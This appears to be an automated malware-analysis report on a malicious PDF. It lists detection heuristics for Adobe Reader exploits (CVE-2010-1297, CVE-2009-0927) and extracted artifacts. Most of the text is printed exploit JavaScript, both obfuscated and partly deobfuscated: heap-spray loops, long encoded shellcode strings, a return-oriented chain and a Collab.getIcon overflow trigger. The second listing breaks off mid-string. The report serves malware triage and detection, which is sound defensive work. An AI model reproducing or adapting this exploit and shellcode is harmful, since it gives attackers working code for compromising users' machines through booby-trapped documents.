MALICIOUS
336
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
-
Adobe Flash authplay SWF exploit in PDF — CVE-2010-1297 critical CVE likely CVE_2010_1297_FLASH_RICHMEDIAPDF combines RichMedia Flash activation, a crafted SWF with ActionScript prototype/AVM-era markers or the AES-PHP/authplay variant markers, and PDF-side shellcode heap-spray staging. This is the static delivery shape associated with CVE-2010-1297 in Adobe Reader's bundled authplay.dll.
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
RichMedia (Flash) high PDF_RICHMEDIAPDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
8.swf |
pdf-embedded-file | PDF EmbeddedFile object 37 at offset 0x2E1C5 | 2557 bytes |
SHA-256: 2aa862d005f88538e38f0035e72490ff3991361b263b95d6130145c16f6a7c8d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
actual_type=SWF; declared_or_context_type=PDF; filename=8.swf; kind=pdf-embedded-file
|
|||
javascript_obj0027_000.js |
pdf-javascript-stream | PDF /JS object 27 at offset 0x2D216 | 11097 bytes |
SHA-256: 75149c3be001060cb4f62ee28c5ec686553abb57c6d1b441ea2c8cc391e14486 |
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc;//ahlfah
for(i=0;i<18000;i++)
sc = sc+0x70;
var h1="\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72";
var unun=unescape;
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret =ret+util[h1](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
sc=unun("\x25\x75\x30\x43\x30\x63%u9090%u9090\x25\x75\x31\x31\x65b\x25\x755bfc\x25\x75334b%u66c9%u2eb9%u8003" +
"\x25\x750b34\x25\x75e28f\x25\x75ebfa\x25\x75e805\x25\x75ffeb\x25\x75ffff\x25\x75bf67\x25\x758f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" +
"%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" +
"%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" +
"%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
function exp() {
//aslf['asgk'g;
blah = rep(128, unun("%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43")) + sc;
bbk = unun("%\x750\x43\x30C\x25u\x30\x430\x43");
wap = blah["\x6ce\x6e\x67\x74h"]+36
while (bbk["l\x65n\x67t\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["\x6ce\x6e\x67\x74h"]-wap);
while(bk["\x6ce\x6e\x67\x74h"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//hdofhajljf2[
for (i=0;i<400;i++) mm[i] = bk + blah;
}
function exp8() {
blah = rep(128, unun("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unun("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
if(app.viewerVersion>=9.40)
{
var LbWxSqgNmAwjUaoXaywhlH = unescape
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH("%\x75\x30C\x30\x43\x25u\x30\x430\x43%u4919%u0700%\x75\x30C\x30\x43\x25u\x30\x430\x43\x25\x7512bb\x25\x750700%\x75\x30C\x30\x43\x25u\x30\x430\x43" +
"%\x75\x30C\x30\x43\x25u\x30\x430\x43%u1599%u0700%u0124%u0001%u72f7%u0700" +
"%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700" +
"%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700" +
"%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001" +
"%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700" +
"%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000" +
"%u0104%u0001%u1000%u0000%u0040%u0000"+
"%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722"+
"%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700"+
"%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb"+
"\x25\x750700%\x75\x30C\x30\x43\x25u\x30\x430\x43\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ee75\x25\x7505eb\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700"+
"\x25\x75e6e8\x25\x75ffff\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x7590ff\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090"+
"\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ffff\x25\x7590ff"+
"%u154d%u0700%ud731%u0700%u112f%u0700"+
"%u3030%u3030\x25\x75\x30\x43\x30\x63\x25\x75\x31\x31\x65b\x25\x755bfc\x25\x75334b%u66c9%u2eb9%u8003" +
"\x25\x750b34\x25\x75e28f\x25\x75ebfa\x25\x75e805\x25\x75ffeb\x25\x75ffff\x25\x75bf67\x25\x758f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" +
"%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" +
"%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" +
"%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("\x25"+ "\x75" + "0" + "C" + "0" + "C" + "\x25u" + "0" + "C" + "0" + "C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else if(app.viewerVersion>=9.00)
{
exp();
}
else
{
exp8();
}
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 27 at offset 0x2D216 | 9739 bytes |
SHA-256: 389ccbd3eedbbf861e4db0568a3a160c2989a49b3fef6bcab40a6186ea5c83b6 |
|||
|
Detection
ClamAV:
Js.Exploit.Shellcode-18
Obfuscation or payload:
likely
13 of 21 identifiers look randomly generated (e.g. 'KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoN') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc;//ahlfah
for(i=0;i<18000;i++)
sc = sc+0x70;
var h1="\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72";
var unun=unescape;
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret =ret+util[h1](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
sc=unun("%u0C0c%u9090%u9090%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d%u064f%ud065%ud2d1%u4dd4%u8f87");
function exp() {
//aslf['asgk'g;
blah = rep(128, unun("%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43%\x750\x43\x30C\x25u\x30\x430\x43")) + sc;
bbk = unun("%\x750\x43\x30C\x25u\x30\x430\x43");
wap = blah["\x6ce\x6e\x67\x74h"]+36
while (bbk["l\x65n\x67t\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["\x6ce\x6e\x67\x74h"]-wap);
while(bk["\x6ce\x6e\x67\x74h"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//hdofhajljf2[
for (i=0;i<400;i++) mm[i] = bk + blah;
}
function exp8() {
blah = rep(128, unun("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unun("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
if(app.viewerVersion>=9.40)
{
var LbWxSqgNmAwjUaoXaywhlH = unescape
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH("%u0C0C%u0C0C%u4919%u0700%u0C0C%u0C0C%u12bb%u0700%u0C0C%u0C0C%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%u3030%u3030%u0C0c%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003" +
"%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f%u8f8f%uca06%